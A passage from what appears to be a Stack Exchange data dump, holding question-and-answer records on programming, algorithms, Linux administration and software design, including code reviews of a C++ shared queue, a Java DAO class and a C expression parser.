libustr-1.0-1 libuuid1 login lsb-base mount multiarch-support ncurses-base ncurses-bin openssl passwd perl-base procps psmisc readline-common sed sensible-utils startpar systemd systemd-sysv sysv-rc sysvinit sysvinit-utils tar tzdata udev util-linux uuid-runtime zlib1g0 upgraded, 143 newly installed, 0 to remove and 0 not upgraded.Need to get 0 B/47,5 MB of archives.After this operation, 149 MB of additional disk space will be used.Do you want to continue [Y/n]? yE: Could not perform immediate configuration on 'multiarch-support'. Please see man 5 apt.conf under APT::Immediate-Configure for details. (2)ispconfig# | Could not perform immediate configuration on 'multiarch-support' | dpkg;dependencies | null |
_cs.33681 | In the same lecture notes without providing many details it says that the complexity of the algorithm which uses a balanced search tree is $O(n\log n+R)$ where $R$ is the total amount of intersections.However I don't understand why this is the case.Suppose that the sweep line is travelling from top to bottom. Whenever we encounter a vertical line segment, we pick its $x$ coordinate and add it to a search tree. Assuming that we are using a balanced search tree like AVL, this operation will take $O(\log n)$ time. Now when we reach an end point of a vertical line segment, we remove its $x$ coordinate from the search tree, which is going to take $O(\log n)$ time as well.Whenever we encounter a horizontal line segment defined by points $A$ and $B$, we have to do a range search on our search tree and use the range defined by these two points, that is $(A.x, B.x)$ Now how is this range search going to happen? We use $A.x$ and travel to the left most point in the search tree, and do the same for $B.x$, we can do this in $O(2\log n)$.All the points in our tree between these two end points are going to be the intersecting the horizontal segment, which is going to be let's say $R$ in total, so $O(2\log n+R)$ in total.We do this $n$ times (the amount of horizontal segments) so we get a complexity of $O(2n\log n+nR)$. | Why is the orthogonal line segment intersection algorithm $O(n\log n+R)$ instead of $O(n\log n + Rn)$? | algorithms;algorithm analysis;computational geometry;search trees | It's a bit hard to get through your text since a lot of information is missing. However I assume that you have the following misunderstanding. Let me ignore the constants in the big-O for this argument since this is irrelevant. For every horizontal segment $h$ you perform an action that takes $O\log n + R_h$ time, where $R_h$ are the intersections you output. Then the overall running time is$$\sum_h \log n + R_h = n\log n +R.$$Simply speaking, you only output every crossing once. So the overall time for the output is $O(R)$. |
_softwareengineering.149911 | Is it recommended to use a WCF Service Library in developing an N-Tier Windows Application? Also is it better to use the VS wizards to create the DataTables and DataSets? And if so should I add all of my tables to 1 dataset or have a dataset for each table? This is all new to me and I want to learn it the right way. | WCF Service in an N-tier Application | c#;database;n tier | Is it recommended to use a WCF Service Library in developing an N-Tier Windows Application? WCF is a good way to access databases through fire walls. However if your application is an application used by users in the same office where there is a common LAN, I don't think the complexity would be justified. This is especially true if the database is owned and controlled only by this one application.Also is it better to use the VS wizards to create the DataTables and DataSets?In many cases, you need to taylor the data passed between the tiers or layers. I would suggest that you look into Entity Framework or another ORM to take care of this for you. Also suggestion by @Ourjamie is good.should I add all of my tables to 1 dataset or have a dataset for each table? As a rule you need to optimize the data moved between tears/layer. Some times you don't need the features of a dataset (like tracking changes), so you don't use what you don't need. Your choice of a data structure will also be affected by the bind mechanism on the client and how you plan to notify the data layer of data changes. It is easier to use datasets but not always popular.I suggest you assess your real need for an N-tier architecture (if N>2). Also, you may want to consider Microsoft RIA Services that may be easier for you than WCF. One last word, sometimes the skills of the team drives technology. Make sure your team is good enough in these technologies before commuting deadlines. |
_codereview.110370 | I have two threads, one produces images and one processes them. For the synchronization, I created a class where you can set and get images, and it always waits until an image is available or a worker thread is not busy anymore.Additionally, a call to SetFinish stops both threads, while a call to Clear clears the currently (not yet processed) image.Do you see any problems with this code (mainly threading issues)?Header:#ifndef SHARED_QUEUE_H_#define SHARED_QUEUE_H_#include <memory>#include <condition_variable>struct ImageData;class SharedQueue {public: void SetFinish(); bool GetImage(std::shared_ptr<const ImageData> &image); void SetImage(std::shared_ptr<const ImageData> image); void Clear();private: std::condition_variable image_available_; std::condition_variable image_processed_; std::shared_ptr<const ImageData> next_image_; bool stop_{false}; std::mutex mutex_;};#endif // SHARED_QUEUE_H_Implementation:#include shared_queue.hvoid SharedQueue::SetFinish() { { // Store flag and wake up the thread std::lock_guard<std::mutex> lock(mutex_); stop_ = true; } image_available_.notify_one(); image_processed_.notify_one();}bool SharedQueue::GetImage(std::shared_ptr<const ImageData> &image) { { std::unique_lock<std::mutex> lock(mutex_); image_available_.wait(lock, [this]{ return (next_image_.get() != nullptr || stop_); }); if (stop_) return false; image = next_image_; next_image_.reset(); } image_processed_.notify_one(); return true;}void SharedQueue::SetImage(std::shared_ptr<const ImageData> image) { { // Store image for processing and wake up the thread std::unique_lock<std::mutex> lock(mutex_); image_processed_.wait(lock, [this]{ return (next_image_.get() == nullptr || stop_); }); if (stop_) return; next_image_ = image; } image_available_.notify_one();}void SharedQueue::Clear() { { std::unique_lock<std::mutex> lock(mutex_); next_image_.reset(); } image_processed_.notify_one();} | Multithreading, shared queue as synchronization point | c++;c++11;multithreading;asynchronous;synchronization | Not a Queue!First and foremost, your SharedQueue isn't a queue. You can only store one element in it at a time. That doesn't make it super useful - what if the producer wants to write two images?queue.setImage(img1);queue.setImage(img2); // blocks?It's more of a guarantee-one-at-a-time container. A queue would be much more useful, so I'd consider actually implementing one. This is a pretty major design flaw.Beyond that, I just have minor comments.Move semanticsYou have a lot of copies where you can do moves. For instance, in SetImage():next_image_ = image;should be:next_image_ = std::move(image);Moving is cheaper than copying (no need to incur reference counting). Checking shared_ptrYou don't need to use .get(), you can directly check the shared_ptr:image_processed_.wait(lock, [this]{ return !next_image_ || stop_;});Clear()You use a std::unique_lock<> to Clear() where a std::lock_guard<> is sufficient. You use the correct one in SetFinish(). |
_softwareengineering.237183 | When Google, Bing or Yahoo are crawling content from Web sites, what makes it legal? Is there a public registry of only allowed crawlers? When researchers are crawling Deep Web, what makes their efforts legal?When tester automate their tests with Selenium or JMeter and hit same site multiple times, what makes their effort illegal?In each of those cases, an automate is consuming Internet bandwidth of the Web site, and copying their content. But some are considered legal, and other are not. | What makes Web crawling legal? | testing;web | At the risk of stating obvious tautologies, something is only illegal if there is a law against it. When someone puts up a website, it is considered open to the public by default. If there is content that should only be available to certain people, it's up to the web designer to secure it in some way.When content is secured, and someone without authorization accesses it through hacking, this is generally considered morally equivalent to finding the door to somebody's house locked and then breaking in, and there are laws against doing so in most jurisdictions.The intent of the website owner matters for a lot. A good deal of deep web content is content that site owners would like to make available, but isn't easily accessible to normal web crawlers. On the other hand, if an owner puts a rule in robots.txt to exclude certain content from a crawler, and the crawler indexes it anyway, this is considered more or less equivalent to wandering onto someone's property when there's a NO TRESPASSING sign in clear view. But most websites welcome search engine traffic, because it drives actual users to the site, which helps accomplish the purpose of the site, whatever that purpose may be. (Usually making money, spreading information, or both.)As for overuse of automated testing tools, this is something very different from a web crawler. A crawler has algorithms to only hit any given page once, and its principal purpose is to index sites so as to drive traffic to them, which most webmasters consider is worth the cost in bandwidth and processor power. But hitting the same page repeatedly by some tool that's not going to bring in new users does nothing to further the purposes of the site, and so the costs that it places on the site owner are essentially wasted. Unless the site owner actually asked for it, (for example, as part of a test of his site's capabilities,) it's generally considered unwelcome and harmful. |
_softwareengineering.314595 | A major application we use has a bug that the vendor is calling (a swear word in our business) working as designed.As a programmer / system analyst this is a bug - and against all I have been taught about systems / database programming / multi-user applications etc. should act when erroneous data is removed / marked deleted etc.The error is that numerous critical at times downstream code (in their own software!) look for a single record in the database for that client current appointment for value X (Table = ClientID, ClientVisitID, Code, CodeValue, DateStamp). This single record holds the most current value for data that changes semi-regularly. If my staff sets the value of X to 123 in any document, or datagrid, or entry form, it updates the single record to X = 123 (depending on the temporal nature of where the data was entered e.g document created yesterday versus time column in the datagrid for today).This speeds up downstream systems who need the value of X - they only have to look in one place, else decide to look in previous visit(s) for the most current value (depending on rules for how long to look back etc)If NO value of X has been recorded this visit, then there is NO row in the single record table. The downstream system then follows other rules (e.g limits on how long to look back) to get the result.The ScenariosMy staff records X = 100 in the last visit (a day ago)My staff records nothing this visitNothing in the single row table (for this visit)Downstream systems retrieve X as 100 from the last visit-My staff records X = 100 in the last visit (a day ago)My staff records X = 120 in the current visit (today)120 in the single row table, datestamp = todayDownstream systems retrieve X = 120 from single row table-My staff records X = 100 in the last visit (a day ago)My staff records X = 999 (in error) in the current visit (today + 1 min)999 in the single row table, datestamp = today + 1 minMy staff deletes the record (as allowed by the application)**empty string (not null) in the single row table, datestamp = today + 1 minDownstream system retrieve nothing, get nothing from the previous visit**-My staff records X = 100 in the last visit (a day ago)My staff records X = 120 in the current visit (today)120 in the single row table, datestamp = todayMy staff records X = 999 (in error) in the current visit (today + 1 min)999 in the single row table, datestamp = today + 1 minMy staff deletes the record (as allowed by the application)**empty string (not null) in the single row table, datestamp = today + 1 minDownstream system retrieve nothing, and act as if 120 never was recorded**So - What PROFOUND IRREFUTABLE Software Design concerpt do I need to tell my vendor this behaviour disobeys ? What Quality standard in programming does this contravene?How do I frame it in a way that make sense? | How to explain to a vendor that when erroneous data is deleted/deactivated the application future state should be as if the data was never entered? | user interface;finite state machine | null |
_codereview.20385 | Before, I had this code, sometimes it is longer:String dbEntry = idBldgInfo = ' + currentBldgID + ',scenario = '305',installCost=' +installCost + ',annualSave=' + annualSave + ',simplePayback=' + simplePayback + ',kwhPre=' + preKWH + ',kwhPost=' + postKWH + ',co2Pre=' + preCO2e + ',co2Post=' +postCO2e + ',mbtuPre=' + preMBtu + ',mbtuPost=' + postMBtu + ',shortDescription=' +econ4ShortDescription + ',category=' + category + ',longDescription=' +econ4LongDescription + ';I refactored it into:String newDbEntry = getDBEntryFromDBPairs( new DBPair(idBldgInfo, currentBldgID), new DBPair(scenario, 305), new DBPair(installCost, installCost), new DBPair(annualSave, annualSave), new DBPair(simplePayback, simplePayback), new DBPair(kwhPre, preKWH), new DBPair(kwhPost, postKWH), new DBPair(co2Pre, preCO2e), new DBPair(co2Post, postCO2e), new DBPair(mbtuPre, preMBtu), new DBPair(mbtuPost, postMBtu), new DBPair(shortDescription, econ4ShortDescription), new DBPair(category, category), new DBPair(longDescription, econ4LongDescription));It looks only slightly better. Is it worth changing it?The getDBEntryFromDBPairs method is much more efficient since it uses a StringBuilder. But IDK. Any thoughts/suggestions are appreciated. | String Building | java;strings | null |
_codereview.25308 | The code below is equivalent. I can see pros and cons for both versions. Which is better: the short, clever way, or the long, ctrl+c way?Short version:character.on(key,function(key){ var action = ({ a:{axis:x,direction:-1}, d:{axis:x,direction:1}, w:{axis:y,direction:1}, s:{axis:y,direction:-1}})[key[1]], stop = key[0]==-; if (action) if (stop) this.walkdir[action.axis] = 0; else this.walkdir[action.axis] = this.lookdir[action.axis] = action.direction;});Long version:character.on(key,function(key){ switch (key){ case +a: this.walkdir.x = -1; this.lookdir.x = -1; break; case +d: this.walkdir.x = 1; this.lookdir.x = 1; break; case +w: this.walkdir.y = 1; this.lookdir.y = 1; break; case +s: this.walkdir.y = -1; this.lookdir.y = -1; break; case -a: if (this.walkdir.x == -1) this.walkdir.x = 0; break; case -d: if (this.walkdir.x == 1) this.walkdir.x = 0; break; case -w: if (this.walkdir.y == 1) this.walkdir.y = 0; break; case -s: if (this.walkdir.y == -1) this.walkdir.y = 0; break; case space: this.setStance(jumping); break; };}); | Two keyboard handlers for a video game character | javascript;game;comparative review;event handling | The short code wins hands down. I understood it immediately, and more importantly, I can trivially verify that the code is reasonably error free. This is much harder with the longer code.You say that the longer code is easier to understand but I claim that this is objectively wrong.Case in point, the long code uses lots of magic numbers: 1, 0, -1, what do these stand for? Ah, the short code tells us: they are directions.The longer code also makes us scroll (depending on the screen size) to see the whole method. This significantly impacts ease of understanding. I believe there were even studies demonstrating this empirically (but I cannot cite them; Code Complete would probably be the relevant reference here).The one thing I would change in the short code is the lookup itself: define the dictionary separately, maybe even outside the method, and perform the lookup as follows:var action = movement_commands[key[1]];And maybe think about tokenising key properly, i.e. assigning the parts to variables before using them. However, I think that the method is short enough to make this unnecessary.You also said that the longer code is more efficient but Id like to see a benchmark before I believe that. You probably think that the first code is slower because of the dictionary lookup. But consider that JavaScript is a dynamic language every single variable access is potentially a dictionary lookup internally. So there is no difference in performance indeed, the short code could be faster since theres less variable lookup involved.(Of course the two code snippets do different things: the long version handles jumping, and they behave differently when the character was previously walking in one direction and now you cancel walking into a different direction.) |
_unix.2811 | A network sensor I'm evaluating is showing that my Opensolaris server is broadcasting on the snmp port 161, and I'm getting alerts about every 2 minutes. How can I turn off the snmp broadcast (i.e. traps?) on the Opensolaris machine?We have snmp enabled on the Opensolaris machine for Cacti, so it should really just be acting like a client in regards to snmp. Is there a configuration setting somewhere? I'm not familiar with snmp, but somehow got it up and running for Cacti. I see that /usr/sbin/snmpd is running. Any thoughts? Thanks. | Opensolaris snmp broadcast | opensolaris | I would check all services running and try disabling each of them one at a time, starting with the most suspicious. Some googling suggests:/etc/rc3.d/S76snmpdx stop/etc/rc3.d/S77dmi stop(assuming you are in runlevel 3) |
_unix.282789 | I have a very a annoying problem. I've using Mac Terminal over SSH to write Perl script with vim on a local virtual Debian machine. The Perl script uses the WWW::Mechanize::Firefox module which in turn uses the MozRepl::RemoteObject object module.The problem I'm having is that output from MozRepl is showing up in another terminal window on another tty every time I run the script, making it a mess:I have to close out the vim session and reopen it to clear the garbage from the terminal.I don't want to completely suppress the output of the script because I need it to print debug statements. I just want to stop the output from MozRepl from showing up in my terminal window.I tried setting log => ['fatal'] when creating the W:M:F object but it had no effect. | MOZREPL output showing up in terminal window | debian;terminal;perl;tty | null |
_softwareengineering.298817 | I'm starting a new MVC 5 project from scratch. I'm using EF 6 (Database First) and Identity 2.0.My solution consists of 3 different projects: Data (where I have a .edmx and my DB context), Resources (for localization purposes) and Web (the web project itself).I'm using ViewModels for all my views, by default. Every time I create a new view, the first thing I do is add the ViewModel (if the ViewModels are connected between them, I keep them all in the same file; for example, all the ViewModels related to user accounts I keep in AccountViewModels). So far, this has made things very simple and solved several issues I was having before.But I'm wondering, does it make sense for me to use Models at all? The only one I am using right now is the one for Identity, which is created by default and contains the ApplicationUser and ApplicationDbContext, both specific and necessary to Identity. Outside of that, it's everything ViewModels.Would my Data project be considered the Model for my application? Thus, I am in fact using a Model, just that instead of being a bunch of classes I keep in Web\Models, it's a separate project where the Models (BL objects created by Entity) are stored. I think so, but I am not sure.Is this a right approach, or could there be potential issues down the road? It's my first take on web programming so I would appreciate any advice. | Never using Models, only ViewModels | c#;.net;mvc;asp.net;asp.net mvc | Would my Data project be considered the Model for my application?Yes, that's exactly what Model is supposed to be.Is this a right approachI believe it is.or could there be potential issues down the road?There definitely will be. But description of your architecture is so vague, that we can only guess what kind of problems will you encounter. |
_softwareengineering.256529 | I am designing a REST API and figured I'll just look at how others are naming their resources and choosing the routes.I look at Twitter's API and see that they have nested resources. For example:https://dev.twitter.com/rest/reference/get/statuses/retweets_of_meThe resource is called retweets_of_me but it's also nested under statuses.Does this mean that there is a logical association between the two resources? I can pick whatever routes I want to use but arbitrarily nesting routes probably isn't good practice. | What are the standards for having nested resources in REST API | rest | null |
_unix.141661 | I want to export the output of vi command :set fileencoding to another file. It seems vi's file encoding detection is better than file command.How to do that?I could write a macro with::set fileencoding:qbut this won't export the output. | Redirect VI command output to a file | vim;vi | In vim, you can use redir command. In command mode::redir > vim.output | set fileencoding | redir ENDThen output of set fileencoding will be save to vim.output. There is many other options of redir, you can see :help redir for more details.This works in vim, not in vi. |
_webmaster.107464 | So as the title asks how would one go about reporting a site for keyword stuffing to google? I can't seem to find anyway to do this other than reporting a site for being spammy. | Reporting a site for keyword stuffing? | seo;reporting;keyword stuffing | null |
_unix.57012 | Possible Duplicate:Customizing bash shell: Bold/color the command bash $ cat what-i-wantI want the output be in a different color.I'd like my commands stand out among the output, without making the prompt overly long. I want to see commands and output in different colors. I understand how to manipulate prompt colors by setting PS1. Is there a way to change color after I pressed Enter but before the command started executing? | Coloring shell command and output differrently | bash;colors;prompt | null |
_unix.91126 | I noticed I have the following in my logs. I just am not sure as to how to go about figuring out how to fix or find out what is causing them and if they are serious.[582046.956291] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 18482 0 0 1379281138 e pipe failed[582346.769892] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 21093 0 0 1379281439 e pipe failed[582646.586134] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 23723 0 0 1379281739 e pipe failed[582946.390029] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 26342 0 0 1379282039 e pipe failed[583246.202851] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 29010 0 0 1379282340 e pipe failed[583546.018408] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 31620 0 0 1379282640 e pipe failed[583845.836688] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 1837 0 0 1379282940 e pipe failed[584145.645968] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 4416 0 0 1379283241 e pipe failed[584445.455705] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 7001 0 0 1379283541 e pipe failed[584745.266532] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 9600 0 0 1379283841 e pipe failed[585045.074399] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 12209 0 0 1379284141 e pipe failed[585344.885464] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 14790 0 0 1379284442 e pipe failed[585644.743818] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 17605 0 0 1379284742 e pipe failed[585944.511572] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 20183 0 0 1379285042 e pipe failed[586244.315990] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 22781 0 0 1379285343 e pipe failed[586544.123020] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 25385 0 0 1379285643 e pipe failed[586843.932084] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 27984 0 0 1379285943 e pipe failed[587143.742379] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 30608 0 0 1379286244 e pipe failed[587443.559349] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 799 0 0 1379286544 e pipe failed[587743.373027] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 3420 0 0 1379286844 e pipe failed[588043.175248] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 6031 0 0 1379287145 e pipe failed[588342.986730] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 8665 0 0 1379287445 e pipe failed[588642.795951] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 11279 0 0 1379287745 e pipe failed[588942.608088] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 13915 0 0 1379288045 e pipe failed[589242.420741] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 16728 0 0 1379288346 e pipe failed[589542.235065] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 19355 0 0 1379288646 e pipe failed[589842.061502] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 21998 0 0 1379288946 e pipe failed[590141.856687] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 24657 0 0 1379289247 e pipe failed[590441.700335] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 27307 0 0 1379289547 e pipe failed[590741.483298] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 29944 0 0 1379289847 e pipe failed[591041.286647] Core dump to |/usr/libexec/abrt-hook-ccpp 7 0 32554 0 0 1379290148 e pipe failed | Debugging dmesg logs | centos;rhel;debugging;core dump | null |
_codereview.70951 | In this specific situation there is a table with trackdata and a form to add rows. For the sake of clarity I won't include the view-related code here. The added rows are added to a LinkedList when appropriate. public class TrackDAO {private List<Track> tracks;private Connection con;public TrackDAO() { tracks = new LinkedList<Track>();}public void addTrack(Track track){ tracks.add(track);}I use a Singleton class for the Database connection.public void connect() throws Exception{ con = Database.getInstance().connect();}public void disconnect() { Database.getInstance().disconnect();}Files can be stored & retrieved locally. public void saveToFile(File file) throws IOException { File getFile = file; if (Utils.getExtension(getFile) == null){ String url = getFile.getAbsolutePath(); url += . + Utils.ml; getFile = new File(url); } FileOutputStream fos = new FileOutputStream(getFile); ObjectOutputStream oos = new ObjectOutputStream(fos); Track[] trackArray = tracks.toArray(new Track[tracks.size()]); oos.writeObject(trackArray); oos.close();}public void loadFromFile(File file) throws IOException { FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis); try { Track[] trackArray = (Track[])ois.readObject(); tracks.clear(); tracks.addAll(Arrays.asList(trackArray)); } catch (ClassNotFoundException e) { e.printStackTrace(); } ois.close();}When the table view is being opened the data will load into the table. public void loadData() throws SQLException{ tracks.clear(); String sql = select id, artist, title, album, tuning, genre, url from track order by title; Statement selectStatement = con.createStatement(); selectStatement.executeQuery(sql); ResultSet results = selectStatement.getResultSet(); while(results.next()){ int id = results.getInt(id); String artist = results.getString(artist); String title = results.getString(title); String album = results.getString(album); String tuning = results.getString(tuning); String genre = results.getString(genre); String fileUrl = results.getString(url); Track track = new Track(id, artist, title, album, tuning, genre, fileUrl); tracks.add(track); System.out.println(track); } results.close(); selectStatement.close();}When the application is being closed the method will query the database for each id and check wether it has to update or insert the track. public void saveToDatabase()throws SQLException { String checkSql = select count(*) as count from track where id=?; PreparedStatement checkStatement = con.prepareStatement(checkSql); String insertSql = insert into track(id, artist, title, album, tuning, genre, url) values(?,?,?,?,?,?,?); PreparedStatement insertStatement = con.prepareStatement(insertSql); String updateSql = update track set artist=?, title=?, album=?, tuning=?, genre=?, url=? where id=?; PreparedStatement updateStatement = con.prepareStatement(updateSql); for(Track track: tracks){ int id = track.getId(); String artist = track.getArtist(); String title = track.getTitle(); String album = track.getAlbum(); String tuning = track.getTuning(); String genre = track.getGenre(); String url = track.getFileUrl(); checkStatement.setInt(1, id); ResultSet checkResult = checkStatement.executeQuery(); checkResult.next(); int count = checkResult.getInt(1); if (count == 0){ System.out.println(Inserting track with ID: + id); int col = 1; insertStatement.setInt(col++, id); insertStatement.setString(col++, artist); insertStatement.setString(col++, title); insertStatement.setString(col++, album); insertStatement.setString(col++, tuning); insertStatement.setString(col++, genre); insertStatement.setString(col++, url); insertStatement.executeUpdate(); System.out.println(insertStatement.toString()); } else { System.out.println(Updating track with ID: + id); int col = 1; updateStatement.setString(col++, artist); updateStatement.setString(col++, title); updateStatement.setString(col++, album); updateStatement.setString(col++, tuning); updateStatement.setString(col++, genre); updateStatement.setString(col++, url); updateStatement.setInt(col++, id); updateStatement.executeUpdate(); } } updateStatement.close(); insertStatement.close(); checkStatement.close();}Finally a track can be deleted by id.public void deleteTrack(int id) throws SQLException{ String checkSql = select count(*) as count from track where id=?; PreparedStatement checkStatement = con.prepareStatement(checkSql); checkStatement.setInt(1, id); ResultSet checkResult = checkStatement.executeQuery(); checkResult.next(); int count = checkResult.getInt(1); if(count!=0){ for(Iterator<Track> it=tracks.iterator(); it.hasNext(); ) { if(it.next().getId()==id) { System.out.println(it); it.remove(); break; } } System.out.println(Deleting track with ID: + id); String deleteSql = delete from track where id=?; PreparedStatement deleteStatement = con.prepareStatement(deleteSql); deleteStatement.setInt(1, id); deleteStatement.executeUpdate(); deleteStatement.close(); } checkStatement.close();}Any advice (on either part or whole) is welcome. | TrackDAO: what can be improved? | java;mysql;linked list;database;file system | first of all, your DAO class is not thread safe. Are you sure this behavior is the goal?connect() method creates a connection every time when it is called, and doesn't disconnect the previous one, this could cause a memory leakat the same method throwing Exception is in order to avoidat saveToFile() why do you need a new pointer to the file object? It's code smell, and the original file is not declared as final so you should replace it anytimeString url = getFile.getAbsolutePath();url += . + Utils.ml; should be replace with String url getFile.getAbsolutePath() + . + Utils.ml; It compiles to StringBuilder, so it's a cheaper operation then the 2 line version.at Track[] trackArray = tracks.toArray(new Track[tracks.size()]); you don't need to initialize the new array with the same size, 0 also will be okinstead of manually close resource(s) in Java 7 you should use an AutoCloseable with tryloadFromFile() is not so nice. For me it's annoying that loadFromFile() drops all of my Tracks previously! This is strange, and need to know this behavior to use this class. If you want to write clean code, you have to avoid things like that.e.printStackTrace() is not acceptable in business applications, so if this is a hobby/school project it could be ok, otherwise it's a big mistake.loadData() -> tracks.clear() -> same storyThis class is not a clean DAO, it's a mixed something, because it not just representing Data Access, it contains other logic, and holding data. I suggest to split the class, create a thread safe stateless data access object, and a container which handles the current Tracks. In this way you should create arbitary number of containers, so you don't need to clear the tracks for exampleat saveToDatabase() check existing should be a separate methodthose Strings are code smellthe if else contains code duplication, you do almost the same on different statements with the same classcheckStatement.close() always close as soon as possiblemissing error handler, if some error occurs the statements stay opendeleteTrack() code duplication!checkStatement.close() close ASAP |
_softwareengineering.210904 | I am trying my hand in python, Django, JQuery.. etc to make a clone of imdb site. Currently I'm in web-development from past 10 months on same technologies. In my spare time I want to develop a side-project which may look good on resume.I came up with an idea, to make a clone of imdb.com. But after 2 weeks of development I stopped.reasons: its not different Why create another imdb?I'm not improving it?Face it, it will be sub standard of original one.The need for the project is to showcase my skills in above technologies but at same time I want it to be useful. | creating a clone of a site is good idea for project? | web development | What you said reminds me of a quote from John Carmack on the subject:In the information age, the barriers [to entry into programming] just aren't there. The barriers are self imposed. If you want to set off and go develop some grand new thing, you don't need millions of dollars of capitalization. You need enough pizza and Diet Coke to stick in your refrigerator, a cheap PC to work on, and the dedication to go through with it. We slept on floors. We waded across rivers. — John CarmackI would say more important than the pizza, Diet Coke, and cheap PC is the dedication. If your heart isn't into it, you'll never make a decent program. And since making something which has already been done before is a strong demotivator, logically you should strive to do something which has never been done before. Oddly enough, it doesn't even have to be that particularly useful since at least for me, that doesn't seem to be so important. It just has to be something which nobody has attempted before. Of course, on a resume, flashy is better, but flashy is not as important as getting it done, so focus on developing something you want to see finished. You can always go back and improve on it (adding a better interface or whatever).When you're coding every night to finish something you enjoy working on, then you'll wind up with a marvelous little project that works and is impressive. If you quit half-way, then it doesn't matter how useful or flashy it would have been. It didn't finish. |
_unix.331260 | First of all, I apologize if this is not the right place to ask this, but I couldn't think of anywhere else (maybe Stack Overflow?).Anyway, I'm looking for a Optical Character Recognition software (OCR) to process my notes. The thing is that occasionally there is an equation there in the middle, so I was looking for a software that can process the text and the equations together that I can run in my Linux system.Ultimately my goal is to create a LaTeX file from that, so it wouldn't hurt if the output was already in LaTeX, but I guess that would be asking too much.I couldn't find anything online that did that, but I think that's mainly because I'm not using the right search terms (English is not my main language). I did find this question but it's from 4 years ago and I think this have changed since then.If I could get one good software to process the text part of the notes, and another to process the equation part of the notes, I'd be able to put them all together already.Does anybody know a way of doing this? | OCR software for equations to get LaTeX file | images;latex;ocr | null |
_cs.16357 | Given two ordered sets of words $a_1, a_2, ..., a_k$, $b_1, b_2, ..., b_k$ taking values in some discrete alphabet $A$, a solution to the PCP problem is a sequence $i_1, ..., i_n$ taking values in $1, 2,..., k$ such that $a_{i_1}|a_{i_2}|...|a_{i_n}=b_{i_1}|b_{i_2}|...|b_{i_n}$ where $|$ means concatenation. $k$ can be called the length of the problem, $n$ the length of the solution and if we let $w$ be the length of the largest word in $a_1, a_2, ..., a_k, b_1, b_2, ..., b_k$, $w$ is called the width of the problem.I know that the PCP problem becomes decidable in several scenarios, for instance: for bounded $n$, or if $A$ is unary, etc. On the other hand for $k\geq7$ PCP is still undecidable. My question is, is there any result known for bounded values of $w$? | Undecidability of the PCP problem with bounded width | computability;reference request;undecidability;decision problem | If $w$ is bounded, and the alphabet size is bounded, then the number of possible words is bounded. Thus, there is only a finite number of possible instances, so the problem becomes a finite languages, and hence decidable.If you don't bound the alphabet, then you can encode any width of $w$ by adding more letters, so the problem is the same as standard PCP, and hence undecidable. |
_scicomp.16406 | For $A=LU$, or $A=LDL^T$ factorization, bandwidth is preserved when there is no pivoting. This is true even for indefinite A, see question. However, when there is pivoting band structure is destroyed, so fill-ins can occur outside the band. I am curious if there is any pivoting that can still preserve sparsity for the factors within some bounds. | Is there an upper bound for fill-ins for indefinite triangular factorization? | sparse;factorization | null |
_codereview.32040 | I'm a C++ programmer using SPOJ problems to learn C(99). This is my solution to the problem CMEXPR, where the goal is to read a valid expression (+, -, *, / only) from input and write it on output with superfluous parentheses removed.The code yields correct answer according to the online judge (got an AC). My question is whether there are any C++-isms in the code and if so, what would be a more idiomatic C way of expressing them. Basically, I don't want to write C++ code in C (just like I don't like C code written in C++).#include <stdbool.h>#include <stddef.h>#include <stdio.h>#include <stdlib.h>//#define TESTING#ifdef TESTING #define TEST_ASSERT(maCond) do { if (!(maCond)) { printf(%d: %s\n, __LINE__, #maCond); exit(1); } } while (0) #define TEST_ASSERT_MSG(maCond, maFormat, maMsg) \ do { \ if (!(maCond)) { printf(%d: %s: ' maFormat '\n, __LINE__, #maCond, (maMsg)); exit(1); } \ } while (0) #define IF_TESTING(...) __VA_ARGS__#else #define TEST_ASSERT(maCond) do {} while (0) #define TEST_ASSERT_MSG(maCond, maFormat, maMsg) do {} while(0) #define IF_TESTING(...)#endifenum ParsingContext{ CONTEXT_FIRST_TERM , CONTEXT_ADDITIVE_EXPRESSION , CONTEXT_NONFIRST_TERM};struct ExprNode{ char type; struct ExprNode *child[2];};struct NodeMemory{ struct ExprNode data[MAX_NODE_COUNT]; struct ExprNode *end;};struct ExprNode* createNode(struct NodeMemory *mem, char type){ struct ExprNode *node = mem->end++; TEST_ASSERT(mem->end - mem->data <= MAX_NODE_COUNT); node->type = type; IF_TESTING( node->child[0] = node->child[1] = NULL; ) return node;}struct ExprNode* moveToChild( struct NodeMemory * restrict mem , struct ExprNode * restrict node , size_t idxChild , char newParentType){ struct ExprNode * result = createNode(mem, newParentType); result->child[idxChild] = node; return result;}char readChar(const char * restrict * restrict in){ char c = **in; ++*in; return c;}void writeChar(char * restrict * restrict out, char c){ **out = c; ++*out;}struct ExprNode* parse( struct NodeMemory * restrict mem , const char * restrict * restrict in , struct ExprNode * restrict root , enum ParsingContext context){ TEST_ASSERT(root != NULL); bool skipStart = (context == CONTEXT_NONFIRST_TERM); // Left operand if (!skipStart) { switch (**in) { case 